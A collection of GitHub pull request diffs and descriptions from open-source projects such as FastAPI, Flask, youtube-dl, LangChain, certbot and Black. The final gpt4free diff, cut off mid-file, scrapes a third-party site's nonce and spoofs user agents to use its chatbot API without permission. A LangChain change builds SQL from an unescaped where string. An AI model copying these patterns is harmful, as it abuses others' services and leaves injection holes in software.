@@ -81,7 +81,7 @@ Diese Schemadefinition enthält Ihre API-Pfade, die möglichen Parameter, welche
#### Daten-„Schema“
-Der Begriff „Schema“ kann sich auch auf die Form von Daten beziehen, wie z.B. einen JSON-Inhalt.
+Der Begriff „Schema“ kann sich auch auf die Form von Daten beziehen, wie z. B. einen JSON-Inhalt.
In diesem Fall sind die JSON-Attribute und deren Datentypen, usw. gemeint.
@@ -328,6 +328,6 @@ Es gibt viele andere Objekte und Modelle, die automatisch zu JSON konvertiert we
* Importieren Sie `FastAPI`.
* Erstellen Sie eine `app` Instanz.
-* Schreiben Sie einen **Pfadoperation-Dekorator** (wie z.B. `@app.get("/")`).
-* Schreiben Sie eine **Pfadoperation-Funktion** (wie z.B. oben `def root(): ...`).
-* Starten Sie den Entwicklungsserver (z.B. `uvicorn main:app --reload`).
+* Schreiben Sie einen **Pfadoperation-Dekorator** (wie z. B. `@app.get("/")`).
+* Schreiben Sie eine **Pfadoperation-Funktion** (wie z. B. oben `def root(): ...`).
+* Starten Sie den Entwicklungsserver (z. B. `uvicorn main:app --reload`).
| https://api.github.com/repos/tiangolo/fastapi/pulls/10959 | 2024-01-13T11:43:29Z | 2024-01-13T12:16:22Z | 2024-01-13T12:16:22Z | 2024-01-13T18:02:41Z | 505 | tiangolo/fastapi | 23,336 |
|
Add missing import for escape in doc | diff --git a/docs/quickstart.rst b/docs/quickstart.rst
index 86b68f9743..9b4fd7bae2 100644
--- a/docs/quickstart.rst
+++ b/docs/quickstart.rst
@@ -200,6 +200,8 @@ You can add variable sections to a URL by marking sections with
as a keyword argument. Optionally, you can use a converter to specify the type
of the argument like ``<converter:variable_name>``. ::
+ from markupsafe import escape
+
@app.route('/user/<username>')
def show_user_profile(username):
# show the user profile for that user
@@ -281,7 +283,8 @@ Python shell. See :ref:`context-locals`.
.. code-block:: python
- from flask import Flask, escape, url_for
+ from flask import Flask, url_for
+ from markupsafe import escape
app = Flask(__name__)
@@ -419,9 +422,9 @@ markup to HTML) you can mark it as safe by using the
:class:`~jinja2.Markup` class or by using the ``|safe`` filter in the
template. Head over to the Jinja 2 documentation for more examples.
-Here is a basic introduction to how the :class:`~jinja2.Markup` class works::
+Here is a basic introduction to how the :class:`~markupsafe.Markup` class works::
- >>> from flask import Markup
+ >>> from markupsafe import Markup
>>> Markup('<strong>Hello %s!</strong>') % '<blink>hacker</blink>'
Markup(u'<strong>Hello <blink>hacker</blink>!</strong>')
>>> Markup.escape('<blink>hacker</blink>')
@@ -768,7 +771,8 @@ unless they know the secret key used for signing.
In order to use sessions you have to set a secret key. Here is how
sessions work::
- from flask import Flask, session, redirect, url_for, escape, request
+ from flask import Flask, session, redirect, url_for, request
+ from markupsafe import escape
app = Flask(__name__)
| `flask.escape` is used in the [Variable Rules](https://flask.palletsprojects.com/en/1.1.x/quickstart/#variable-rules) section but is never imported; this PR adds the missing import statement.
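For context, a quick REPL sketch of what `escape` does (mirroring the Markup example already in the quickstart):
```python
>>> from markupsafe import escape
>>> escape('<blink>hacker</blink>')
Markup('&lt;blink&gt;hacker&lt;/blink&gt;')
```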
Fix #3471 | https://api.github.com/repos/pallets/flask/pulls/3473 | 2020-01-22T15:15:59Z | 2020-02-11T02:12:50Z | 2020-02-11T02:12:50Z | 2020-11-14T01:42:42Z | 487 | pallets/flask | 20,708 |
bugfix: docker image metagpt/metagpt:v0.1 -> metagpt/metagpt:v0.2 | diff --git a/README.md b/README.md
index d2057a4bb..8ade2339b 100644
--- a/README.md
+++ b/README.md
@@ -54,9 +54,9 @@ python setup.py install
### Installation by Docker
```bash
# Step 1: Download metagpt official image and prepare config.yaml
-docker pull metagpt/metagpt:v0.1
+docker pull metagpt/metagpt:v0.2
mkdir -p /opt/metagpt/{config,workspace} && chmod 777 -R /opt/metagpt
-docker run --rm metagpt/metagpt:v0.1 cat /app/metagpt/config/config.yaml > /opt/metagpt/config/config.yaml
+docker run --rm metagpt/metagpt:v0.2 cat /app/metagpt/config/config.yaml > /opt/metagpt/config/config.yaml
vim /opt/metagpt/config/config.yaml # Change the config
# Step 2: Run metagpt demo with container
| https://api.github.com/repos/geekan/MetaGPT/pulls/44 | 2023-07-13T08:36:37Z | 2023-07-13T08:49:39Z | 2023-07-13T08:49:39Z | 2023-07-13T08:49:40Z | 229 | geekan/MetaGPT | 16,532 |
|
added extractor for dctp.tv | diff --git a/youtube_dl/downloader/rtmp.py b/youtube_dl/downloader/rtmp.py
index e06ebe8266f..f7eeb6f43f0 100644
--- a/youtube_dl/downloader/rtmp.py
+++ b/youtube_dl/downloader/rtmp.py
@@ -104,6 +104,7 @@ def run_rtmpdump(args):
live = info_dict.get('rtmp_live', False)
conn = info_dict.get('rtmp_conn', None)
protocol = info_dict.get('rtmp_protocol', None)
+ real_time = info_dict.get('rtmp_real_time', False)
no_resume = info_dict.get('no_resume', False)
continue_dl = info_dict.get('continuedl', False)
@@ -143,6 +144,8 @@ def run_rtmpdump(args):
basic_args += ['--conn', conn]
if protocol is not None:
basic_args += ['--protocol', protocol]
+ if real_time:
+ basic_args += ['--realtime']
args = basic_args
if not no_resume and continue_dl and not live:
diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py
index 03c56156a97..873ae69d3c2 100644
--- a/youtube_dl/extractor/__init__.py
+++ b/youtube_dl/extractor/__init__.py
@@ -89,6 +89,7 @@
)
from .daum import DaumIE
from .dbtv import DBTVIE
+from .dctp import DctpTvIE
from .deezer import DeezerPlaylistIE
from .dfb import DFBIE
from .dotsub import DotsubIE
diff --git a/youtube_dl/extractor/dctp.py b/youtube_dl/extractor/dctp.py
new file mode 100644
index 00000000000..8a77f2b662e
--- /dev/null
+++ b/youtube_dl/extractor/dctp.py
@@ -0,0 +1,50 @@
+# encoding: utf-8
+from __future__ import unicode_literals
+
+from .common import InfoExtractor
+
+
+class DctpTvIE(InfoExtractor):
+ _VALID_URL = r'^http://www.dctp.tv/(#/)?filme/(?P<id>.+?)/$'
+ _TEST = {
+ 'url': 'http://www.dctp.tv/filme/videoinstallation-fuer-eine-kaufhausfassade/',
+ 'info_dict': {
+ 'id': '1324',
+ 'display_id': 'videoinstallation-fuer-eine-kaufhausfassade',
+ 'ext': 'flv',
+ 'title': 'Videoinstallation für eine Kaufhausfassade'}
+ }
+
+ def _real_extract(self, url):
+ video_id = self._match_id(url)
+ base_url = 'http://dctp-ivms2-restapi.s3.amazonaws.com/'
+ version_json = self._download_json(base_url + 'version.json', video_id)
+ version = version_json['version_name']
+ info_json = self._download_json(
+ '{0}{1}/restapi/slugs/{2}.json'.format(base_url, version, video_id), video_id)
+ object_id = str(info_json['object_id'])
+ meta_json = self._download_json(
+ '{0}{1}/restapi/media/{2}.json'.format(base_url, version, object_id), video_id)
+ uuid = meta_json['uuid']
+ title = meta_json['title']
+ wide = meta_json['is_wide']
+ if wide:
+ ratio = '16x9'
+ else:
+ ratio = '4x3'
+ play_path = 'mp4:{0}_dctp_0500_{1}.m4v'.format(uuid, ratio)
+
+ servers_json = self._download_json('http://www.dctp.tv/streaming_servers/', video_id)
+ url = servers_json[0]['endpoint']
+
+ return {
+ 'id': object_id,
+ 'title': title,
+ 'format': 'rtmp',
+ 'url': url,
+ 'play_path': play_path,
+ 'rtmp_real_time': True,
+ 'ext': 'flv',
+ 'display_id': video_id
+ }
+
| Needs the --realtime flag for rtmpdump; otherwise the downloaded video is broken.
The fetched JSON file has more metadata. Not sure what it is used for, other than bookkeeping, so I leave this as a TODO.
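A hedged sketch of how the new `rtmp_real_time` field maps onto the final rtmpdump invocation (endpoint and play path are illustrative):
```python
info_dict = {"rtmp_real_time": True}  # set by the new dctp extractor

basic_args = [
    "rtmpdump",
    "-r", "rtmp://example-endpoint/streaming",         # illustrative endpoint
    "--playpath", "mp4:some-uuid_dctp_0500_16x9.m4v",  # illustrative play path
    "-o", "out.flv",
]
if info_dict.get("rtmp_real_time", False):
    basic_args += ["--realtime"]  # pace the download at stream speed
```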
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/4796 | 2015-01-28T08:07:15Z | 2015-01-30T02:16:42Z | 2015-01-30T02:16:42Z | 2015-01-30T02:16:57Z | 982 | ytdl-org/youtube-dl | 50,478 |
Add airoboros_v3 chat template (llama-2 format) | diff --git a/fastchat/conversation.py b/fastchat/conversation.py
index d782b55e7e..f36cbfe903 100644
--- a/fastchat/conversation.py
+++ b/fastchat/conversation.py
@@ -392,6 +392,18 @@ def get_conv_template(name: str) -> Conversation:
)
)
+register_conv_template(
+ Conversation(
+ name="airoboros_v3",
+ system_template="[INST] <<SYS>>\n{system_message}\n<</SYS>>\n\n",
+ system_message="You are a helpful, unbiased, uncensored assistant.",
+ roles=("[INST]", "[/INST]"),
+ sep_style=SeparatorStyle.LLAMA2,
+ sep=" ",
+ sep2=" </s><s>",
+ )
+)
+
# Koala default template
register_conv_template(
Conversation(
diff --git a/fastchat/model/model_adapter.py b/fastchat/model/model_adapter.py
index f33d5232d7..832fe93c15 100644
--- a/fastchat/model/model_adapter.py
+++ b/fastchat/model/model_adapter.py
@@ -611,6 +611,8 @@ def match(self, model_path: str):
return False
def get_default_conv_template(self, model_path: str) -> Conversation:
+ if "-3." in model_path or "-3p" in model_path:
+ return get_conv_template("airoboros_v3")
if "spicyboros" in model_path or re.search(r"-(2\.[2-9]+)", model_path):
return get_conv_template("airoboros_v2")
return get_conv_template("airoboros_v1")
| ## Why are these changes needed?
Add support for the llama-2-based prompt format used by the airoboros-3.x models (a usage sketch follows the checklist below).
## Checks
- [x] I've run `format.sh` to lint the changes in this PR.
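A hedged usage sketch of the new template (output shape follows the registered separators; exact spacing not verified here):
```python
from fastchat.conversation import get_conv_template

conv = get_conv_template("airoboros_v3")
conv.append_message(conv.roles[0], "Hello!")  # "[INST]"
conv.append_message(conv.roles[1], None)      # "[/INST]", the model's turn
print(conv.get_prompt())
```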
| https://api.github.com/repos/lm-sys/FastChat/pulls/2564 | 2023-10-15T09:48:05Z | 2023-10-15T19:27:15Z | 2023-10-15T19:27:15Z | 2023-10-15T19:27:15Z | 370 | lm-sys/FastChat | 41,717 |
Add MyScaleWithoutJSON which allows user to wrap columns into Document's Metadata | diff --git a/libs/langchain/langchain/vectorstores/myscale.py b/libs/langchain/langchain/vectorstores/myscale.py
index 609c496e1480b6..9dbc6ae40a9a26 100644
--- a/libs/langchain/langchain/vectorstores/myscale.py
+++ b/libs/langchain/langchain/vectorstores/myscale.py
@@ -490,3 +490,125 @@ def delete(
@property
def metadata_column(self) -> str:
return self.config.column_map["metadata"]
+
+
+class MyScaleWithoutJSON(MyScale):
+ """MyScale vector store without metadata column
+
+ This is super handy if you are working to a SQL-native table
+ """
+
+ def __init__(
+ self,
+ embedding: Embeddings,
+ config: Optional[MyScaleSettings] = None,
+ must_have_cols: List[str] = [],
+ **kwargs: Any,
+ ) -> None:
+ """Building a myscale vector store without metadata column
+
+ embedding (Embeddings): embedding model
+ config (MyScaleSettings): Configuration to MyScale Client
+ must_have_cols (List[str]): column names to be included in query
+ Other keyword arguments will pass into
+ [clickhouse-connect](https://docs.myscale.com/)
+ """
+ super().__init__(embedding, config, **kwargs)
+ self.must_have_cols: List[str] = must_have_cols
+
+ def _build_qstr(
+ self, q_emb: List[float], topk: int, where_str: Optional[str] = None
+ ) -> str:
+ q_emb_str = ",".join(map(str, q_emb))
+ if where_str:
+ where_str = f"PREWHERE {where_str}"
+ else:
+ where_str = ""
+
+ q_str = f"""
+ SELECT {self.config.column_map['text']}, dist,
+ {','.join(self.must_have_cols)}
+ FROM {self.config.database}.{self.config.table}
+ {where_str}
+ ORDER BY distance({self.config.column_map['vector']}, [{q_emb_str}])
+ AS dist {self.dist_order}
+ LIMIT {topk}
+ """
+ return q_str
+
+ def similarity_search_by_vector(
+ self,
+ embedding: List[float],
+ k: int = 4,
+ where_str: Optional[str] = None,
+ **kwargs: Any,
+ ) -> List[Document]:
+ """Perform a similarity search with MyScale by vectors
+
+ Args:
+ query (str): query string
+ k (int, optional): Top K neighbors to retrieve. Defaults to 4.
+ where_str (Optional[str], optional): where condition string.
+ Defaults to None.
+
+ NOTE: Please do not let end-user to fill this and always be aware
+ of SQL injection. When dealing with metadatas, remember to
+ use `{self.metadata_column}.attribute` instead of `attribute`
+ alone. The default name for it is `metadata`.
+
+ Returns:
+ List[Document]: List of (Document, similarity)
+ """
+ q_str = self._build_qstr(embedding, k, where_str)
+ try:
+ return [
+ Document(
+ page_content=r[self.config.column_map["text"]],
+ metadata={k: r[k] for k in self.must_have_cols},
+ )
+ for r in self.client.query(q_str).named_results()
+ ]
+ except Exception as e:
+ logger.error(f"\033[91m\033[1m{type(e)}\033[0m \033[95m{str(e)}\033[0m")
+ return []
+
+ def similarity_search_with_relevance_scores(
+ self, query: str, k: int = 4, where_str: Optional[str] = None, **kwargs: Any
+ ) -> List[Tuple[Document, float]]:
+ """Perform a similarity search with MyScale
+
+ Args:
+ query (str): query string
+ k (int, optional): Top K neighbors to retrieve. Defaults to 4.
+ where_str (Optional[str], optional): where condition string.
+ Defaults to None.
+
+ NOTE: Please do not let end-user to fill this and always be aware
+ of SQL injection. When dealing with metadatas, remember to
+ use `{self.metadata_column}.attribute` instead of `attribute`
+ alone. The default name for it is `metadata`.
+
+ Returns:
+ List[Document]: List of documents most similar to the query text
+ and cosine distance in float for each.
+ Lower score represents more similarity.
+ """
+ q_str = self._build_qstr(self._embeddings.embed_query(query), k, where_str)
+ try:
+ return [
+ (
+ Document(
+ page_content=r[self.config.column_map["text"]],
+ metadata={k: r[k] for k in self.must_have_cols},
+ ),
+ r["dist"],
+ )
+ for r in self.client.query(q_str).named_results()
+ ]
+ except Exception as e:
+ logger.error(f"\033[91m\033[1m{type(e)}\033[0m \033[95m{str(e)}\033[0m")
+ return []
+
+ @property
+ def metadata_column(self) -> str:
+ return ""
| - **Description:** Add MyScaleWithoutJSON which allows user to wrap columns into Document's Metadata
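A hedged usage sketch (host, embedding model, and column names are illustrative):
```python
from langchain.embeddings import OpenAIEmbeddings
from langchain.vectorstores.myscale import MyScaleSettings, MyScaleWithoutJSON

config = MyScaleSettings(host="msc-example.aws.myscale.com", port=443)
store = MyScaleWithoutJSON(
    OpenAIEmbeddings(),
    config,
    must_have_cols=["doc_url", "chapter"],  # returned inside each Document's metadata
)
docs = store.similarity_search("what is a vector index?", k=4)
```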
- **Tag maintainer:** @baskaryan | https://api.github.com/repos/langchain-ai/langchain/pulls/13164 | 2023-11-10T03:51:25Z | 2023-11-13T18:10:36Z | 2023-11-13T18:10:36Z | 2023-11-16T09:32:43Z | 1,219 | langchain-ai/langchain | 43,382 |
[jobs] Fix `test_backwards_compatibility.py` by pinning `pydantic<2` | diff --git a/dashboard/modules/job/tests/backwards_compatibility_scripts/test_backwards_compatibility.sh b/dashboard/modules/job/tests/backwards_compatibility_scripts/test_backwards_compatibility.sh
index 4ec95a112e904..8ae0da8688d31 100755
--- a/dashboard/modules/job/tests/backwards_compatibility_scripts/test_backwards_compatibility.sh
+++ b/dashboard/modules/job/tests/backwards_compatibility_scripts/test_backwards_compatibility.sh
@@ -34,8 +34,8 @@ do
conda create -y -n "${env_name}" python="${PYTHON_VERSION}"
conda activate "${env_name}"
- pip install -U ray=="${RAY_VERSION}"
- pip install -U ray[default]=="${RAY_VERSION}"
+ # Pin pydantic version due to: https://github.com/ray-project/ray/issues/36990.
+ pip install -U "pydantic<2" ray=="${RAY_VERSION}" ray[default]=="${RAY_VERSION}"
printf "\n\n\n"
echo "========================================================="
| ## Why are these changes needed?
This appears to be the same issue as https://github.com/ray-project/ray/issues/36990
Pinning the pydantic version in the install step in `test_backwards_compatibility.sh` fixes it.
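As a hedged sanity check one could run inside the created conda env (attribute name per pydantic's public API):
```python
import pydantic

major = int(pydantic.VERSION.split(".")[0])
assert major < 2, f"expected pydantic<2, got {pydantic.VERSION}"
```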
## Related issue number
## Checks
- [ ] I've signed off every commit (by using the -s flag, i.e., `git commit -s`) in this PR.
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
- [ ] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [ ] I've added any new APIs to the API Reference. For example, if I added a
method in Tune, I've added it in `doc/source/tune/api/` under the
corresponding `.rst` file.
- [ ] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [ ] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
| https://api.github.com/repos/ray-project/ray/pulls/37097 | 2023-07-05T14:15:44Z | 2023-07-05T16:49:00Z | 2023-07-05T16:49:00Z | 2023-07-05T16:49:01Z | 225 | ray-project/ray | 19,223 |
Update README.md | diff --git a/README.md b/README.md
index 5c7fa3949..0cb86c750 100644
--- a/README.md
+++ b/README.md
@@ -29,6 +29,10 @@ CentOS:
yum install python-setuptools && easy_install pip
pip install shadowsocks
+Linux distributions with [snap](http://snapcraft.io/):
+
+ snap install shadowsocks
+
Windows:
See [Install Shadowsocks Server on Windows](https://github.com/shadowsocks/shadowsocks/wiki/Install-Shadowsocks-Server-on-Windows).
@@ -52,6 +56,11 @@ To check the log:
Check all the options via `-h`. You can also use a [Configuration] file
instead.
+If you installed the [snap](http://snapcraft.io/) package, you have to prefix the commands with `shadowsocks.`,
+like this:
+
+ shadowsocks.ssserver -p 443 -k password -m aes-256-cfb
+
### Usage with Config File
[Create configeration file and run](https://github.com/shadowsocks/shadowsocks/wiki/Configuration-via-Config-File)
| Add installation and usage instructions for snap package. | https://api.github.com/repos/shadowsocks/shadowsocks/pulls/734 | 2017-01-19T18:40:08Z | 2017-09-06T07:13:27Z | 2017-09-06T07:13:27Z | 2017-09-06T07:13:27Z | 265 | shadowsocks/shadowsocks | 24,640 |
fix problem with path being double escaped | diff --git a/requests/models.py b/requests/models.py
index 82c7572995..c2cbe97918 100644
--- a/requests/models.py
+++ b/requests/models.py
@@ -351,8 +351,8 @@ def path_url(self):
if not path:
path = '/'
- # if is_py3:
- path = quote(path.encode('utf-8'))
+ if is_py3:
+ path = quote(path.encode('utf-8'))
url.append(path)
diff --git a/test_requests.py b/test_requests.py
index 034f469c5b..c3f3deb646 100644
--- a/test_requests.py
+++ b/test_requests.py
@@ -72,6 +72,12 @@ def test_entry_points(self):
def test_invalid_url(self):
self.assertRaises(ValueError, get, 'hiwpefhipowhefopw')
+
+ def test_path_is_not_double_encoded(self):
+ request = requests.Request("http://0.0.0.0/get/~test")
+
+ assert request.path_url == "/get/%7Etest"
+
def test_HTTP_200_OK_GET(self):
r = get(httpbin('/get'))
self.assertEqual(r.status_code, 200)
On Python 2.6.4 (at least) the path portion is getting escaped twice -> once in Request.full_url and once in Request.path_url.
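For illustration, the symptom in a Python 2 REPL (on Python 3.7+, `~` is left unescaped, so the values differ):
```python
>>> from urllib import quote  # urllib.parse.quote on Python 3
>>> quote('/get/~test')
'/get/%7Etest'
>>> quote(quote('/get/~test'))
'/get/%257Etest'
```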
This fixes it, but I don't know why there was a commented test for Python 3.
| https://api.github.com/repos/psf/requests/pulls/387 | 2012-01-25T16:24:25Z | 2012-01-25T16:25:26Z | 2012-01-25T16:25:26Z | 2021-09-09T00:01:25Z | 281 | psf/requests | 32,448 |
Fix parser bug where "type" was misinterpreted as a keyword inside a match | diff --git a/CHANGES.md b/CHANGES.md
index 610a9de0e4..f89b1b9df0 100644
--- a/CHANGES.md
+++ b/CHANGES.md
@@ -37,6 +37,8 @@
<!-- Changes to the parser or to version autodetection -->
+- Fix bug where attributes named `type` were not acccepted inside `match` statements
+ (#3950)
- Add support for PEP 695 type aliases containing lambdas and other unusual expressions
(#3949)
diff --git a/src/blib2to3/pgen2/parse.py b/src/blib2to3/pgen2/parse.py
index 299cc24a15..ad51a3dad0 100644
--- a/src/blib2to3/pgen2/parse.py
+++ b/src/blib2to3/pgen2/parse.py
@@ -211,6 +211,7 @@ def __init__(self, grammar: Grammar, convert: Optional[Convert] = None) -> None:
# See note in docstring above. TL;DR this is ignored.
self.convert = convert or lam_sub
self.is_backtracking = False
+ self.last_token: Optional[int] = None
def setup(self, proxy: "TokenProxy", start: Optional[int] = None) -> None:
"""Prepare for parsing.
@@ -236,6 +237,7 @@ def setup(self, proxy: "TokenProxy", start: Optional[int] = None) -> None:
self.rootnode: Optional[NL] = None
self.used_names: Set[str] = set()
self.proxy = proxy
+ self.last_token = None
def addtoken(self, type: int, value: str, context: Context) -> bool:
"""Add a token; return True iff this is the end of the program."""
@@ -317,6 +319,7 @@ def _addtoken(self, ilabel: int, type: int, value: str, context: Context) -> boo
dfa, state, node = self.stack[-1]
states, first = dfa
# Done with this token
+ self.last_token = type
return False
else:
@@ -343,9 +346,23 @@ def classify(self, type: int, value: str, context: Context) -> List[int]:
return [self.grammar.keywords[value]]
elif value in self.grammar.soft_keywords:
assert type in self.grammar.tokens
+ # Current soft keywords (match, case, type) can only appear at the
+ # beginning of a statement. So as a shortcut, don't try to treat them
+ # like keywords in any other context.
+ # ('_' is also a soft keyword in the real grammar, but for our grammar
+ # it's just an expression, so we don't need to treat it specially.)
+ if self.last_token not in (
+ None,
+ token.INDENT,
+ token.DEDENT,
+ token.NEWLINE,
+ token.SEMI,
+ token.COLON,
+ ):
+ return [self.grammar.tokens[type]]
return [
- self.grammar.soft_keywords[value],
self.grammar.tokens[type],
+ self.grammar.soft_keywords[value],
]
ilabel = self.grammar.tokens.get(type)
diff --git a/tests/data/cases/pattern_matching_complex.py b/tests/data/cases/pattern_matching_complex.py
index b4355c7333..10b4d26e28 100644
--- a/tests/data/cases/pattern_matching_complex.py
+++ b/tests/data/cases/pattern_matching_complex.py
@@ -143,3 +143,7 @@
y = 1
case []:
y = 2
+# issue 3790
+match (X.type, Y):
+ case _:
+ pass
diff --git a/tests/data/cases/type_aliases.py b/tests/data/cases/type_aliases.py
index 9631bfd5cc..7c2009e820 100644
--- a/tests/data/cases/type_aliases.py
+++ b/tests/data/cases/type_aliases.py
@@ -5,6 +5,8 @@
type Alias[T]=lambda: T
type And[T]=T and T
type IfElse[T]=T if T else T
+type One = int; type Another = str
+class X: type InClass = int
type = aliased
print(type(42))
@@ -16,6 +18,13 @@
type Alias[T] = lambda: T
type And[T] = T and T
type IfElse[T] = T if T else T
+type One = int
+type Another = str
+
+
+class X:
+ type InClass = int
+
type = aliased
print(type(42))
| Fixes #3790
Slightly hacky, but I think this is correct and it should also improve performance somewhat.
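For context, a minimal input that previously tripped the parser (mirrors the test case added in `pattern_matching_complex.py`):
```python
# Before this fix, "type" after "X." was misread as a soft keyword here.
match (X.type, Y):
    case _:
        pass
```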
| https://api.github.com/repos/psf/black/pulls/3950 | 2023-10-16T14:07:05Z | 2023-10-17T07:59:16Z | 2023-10-17T07:59:16Z | 2023-10-17T07:59:16Z | 1,059 | psf/black | 24,167 |
Add Hindi language to config | diff --git a/website/next-i18next.config.js b/website/next-i18next.config.js
index 953720ccd9..26f007b2d0 100644
--- a/website/next-i18next.config.js
+++ b/website/next-i18next.config.js
@@ -19,6 +19,7 @@ module.exports = {
"fr",
"gl",
"he",
+ "hi",
"hu",
"id",
"it",
| This language was added as a translation but never added to the config file so it did not actually activate on the website. | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/2881 | 2023-04-24T16:26:56Z | 2023-04-24T16:54:04Z | 2023-04-24T16:54:04Z | 2023-04-25T12:42:34Z | 110 | LAION-AI/Open-Assistant | 37,556 |
Fix permissions error when upgrading certbot-auto 0.18.x | diff --git a/letsencrypt-auto-source/letsencrypt-auto b/letsencrypt-auto-source/letsencrypt-auto
index 223fbfd321f..254f02c0acf 100755
--- a/letsencrypt-auto-source/letsencrypt-auto
+++ b/letsencrypt-auto-source/letsencrypt-auto
@@ -187,8 +187,7 @@ SetRootAuthMechanism() {
if [ "$1" = "--cb-auto-has-root" ]; then
shift 1
-elif [ "$1" != "--le-auto-phase2" ]; then
- # if $1 is --le-auto-phase2, we've executed this branch before
+else
SetRootAuthMechanism
if [ -n "$SUDO" ]; then
echo "Requesting to rerun $0 with root privileges..."
@@ -197,6 +196,14 @@ elif [ "$1" != "--le-auto-phase2" ]; then
fi
fi
+# Runs this script again with the given arguments. --cb-auto-has-root is added
+# to the command line arguments to ensure we don't try to acquire root a
+# second time. After the script is rerun, we exit the current script.
+RerunWithArgs() {
+ "$0" --cb-auto-has-root "$@"
+ exit 0
+}
+
BootstrapMessage() {
# Arguments: Platform name
say "Bootstrapping dependencies for $1... (you can skip this with --no-bootstrap)"
@@ -825,8 +832,7 @@ if [ "$1" = "--le-auto-phase2" ]; then
# if non-interactive mode or stdin and stdout are connected to a terminal
if [ \( "$NONINTERACTIVE" = 1 \) -o \( \( -t 0 \) -a \( -t 1 \) \) ]; then
rm -rf "$VENV_PATH"
- "$0" "$@"
- exit 0
+ RerunWithArgs "$@"
else
error "Skipping upgrade because new OS dependencies may need to be installed."
error
@@ -1491,5 +1497,5 @@ UNLIKELY_EOF
fi # A newer version is available.
fi # Self-upgrading is allowed.
- "$0" --le-auto-phase2 "$@"
+ RerunWithArgs --le-auto-phase2 "$@"
fi
diff --git a/letsencrypt-auto-source/letsencrypt-auto.template b/letsencrypt-auto-source/letsencrypt-auto.template
index eb2b827768a..4eef10c804a 100755
--- a/letsencrypt-auto-source/letsencrypt-auto.template
+++ b/letsencrypt-auto-source/letsencrypt-auto.template
@@ -187,8 +187,7 @@ SetRootAuthMechanism() {
if [ "$1" = "--cb-auto-has-root" ]; then
shift 1
-elif [ "$1" != "--le-auto-phase2" ]; then
- # if $1 is --le-auto-phase2, we've executed this branch before
+else
SetRootAuthMechanism
if [ -n "$SUDO" ]; then
echo "Requesting to rerun $0 with root privileges..."
@@ -197,6 +196,14 @@ elif [ "$1" != "--le-auto-phase2" ]; then
fi
fi
+# Runs this script again with the given arguments. --cb-auto-has-root is added
+# to the command line arguments to ensure we don't try to acquire root a
+# second time. After the script is rerun, we exit the current script.
+RerunWithArgs() {
+ "$0" --cb-auto-has-root "$@"
+ exit 0
+}
+
BootstrapMessage() {
# Arguments: Platform name
say "Bootstrapping dependencies for $1... (you can skip this with --no-bootstrap)"
@@ -406,8 +413,7 @@ if [ "$1" = "--le-auto-phase2" ]; then
# if non-interactive mode or stdin and stdout are connected to a terminal
if [ \( "$NONINTERACTIVE" = 1 \) -o \( \( -t 0 \) -a \( -t 1 \) \) ]; then
rm -rf "$VENV_PATH"
- "$0" "$@"
- exit 0
+ RerunWithArgs "$@"
else
error "Skipping upgrade because new OS dependencies may need to be installed."
error
@@ -567,5 +573,5 @@ UNLIKELY_EOF
fi # A newer version is available.
fi # Self-upgrading is allowed.
- "$0" --le-auto-phase2 "$@"
+ RerunWithArgs --le-auto-phase2 "$@"
fi
| Cherry-picked from #5086 and commit 82d0ff1df249cdd6748b95aab73ec4aa19b24cb6. | https://api.github.com/repos/certbot/certbot/pulls/5089 | 2017-09-08T00:26:37Z | 2017-09-08T02:40:42Z | 2017-09-08T02:40:42Z | 2017-09-08T02:40:45Z | 1,036 | certbot/certbot | 1,858 |
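The shell pattern above -- rerun with a marker flag so root is acquired only once -- translates roughly to this Python sketch (the flag name and sudo invocation are illustrative, not certbot-auto's actual code):

```python
import os
import sys

MARKER = "--has-root"  # hypothetical stand-in for --cb-auto-has-root

def ensure_root():
    """Re-exec this script under sudo exactly once, guarded by a marker flag."""
    if MARKER in sys.argv:
        sys.argv.remove(MARKER)  # already re-executed; drop the marker
        return
    if os.geteuid() != 0:
        # Rerun the same script with sudo, adding the marker so the new
        # process does not try to acquire root a second time.
        os.execvp("sudo", ["sudo", sys.executable, sys.argv[0], MARKER] + sys.argv[1:])
```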
Automatically obtain restNonce | diff --git a/gpt4free/hpgptai/__init__.py b/gpt4free/hpgptai/__init__.py
index c8772a19f5..f5d1f0edc3 100644
--- a/gpt4free/hpgptai/__init__.py
+++ b/gpt4free/hpgptai/__init__.py
@@ -5,20 +5,26 @@
@File :__init__.py.py
@IDE :PyCharm
"""
+import re
import json
-import requests
+import base64
import random
import string
+import requests
+from fake_useragent import UserAgent
+
class ChatCompletion:
@staticmethod
def create(
messages: list,
- context: str="Converse as if you were an AI assistant. Be friendly, creative.",
- restNonce:str="9d6d743bd3",
- proxy:str=None
+ context: str = "Converse as if you were an AI assistant. Be friendly, creative.",
+ restNonce: str = None,
+ proxy: str = None
):
url = "https://chatgptlogin.ac/wp-json/ai-chatbot/v1/chat"
+ if not restNonce:
+ restNonce = ChatCompletion.get_restNonce(proxy)
headers = {
"Content-Type": "application/json",
"X-Wp-Nonce": restNonce
@@ -27,7 +33,7 @@ def create(
data = {
"env": "chatbot",
"session": "N/A",
- "prompt": ChatCompletion.__build_prompt(context,messages),
+ "prompt": ChatCompletion.__build_prompt(context, messages),
"context": context,
"messages": messages,
"newMessage": messages[-1]["content"],
@@ -48,7 +54,6 @@ def create(
return res.json()
return res.text
-
@staticmethod
def randomStr():
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=34))[:11]
@@ -66,12 +71,26 @@ def __build_prompt(cls, context: str, message: list, isCasuallyFineTuned=False,
prompt += '\n' + "AI: "
return prompt
-
+ @classmethod
+ def get_restNonce(cls, proxy: str = None):
+ url = "https://chatgptlogin.ac/"
+ headers = {
+ "Referer": "https://chatgptlogin.ac/",
+ "User-Agent": UserAgent().random
+ }
+ proxies = {'http': 'http://' + proxy, 'https': 'http://' + proxy} if proxy else None
+ res = requests.get(url, headers=headers, proxies=proxies)
+ src = re.search(
+ 'class="mwai-chat mwai-chatgpt">.*<span>Send</span></button></div></div></div> <script defer src="(.*?)">',
+ res.text).group(1)
+ decoded_string = base64.b64decode(src.split(",")[-1]).decode('utf-8')
+ restNonce = re.search(r"let restNonce = '(.*?)';", decoded_string).group(1)
+ return restNonce
class Completion:
@staticmethod
- def create(prompt: str,proxy:str):
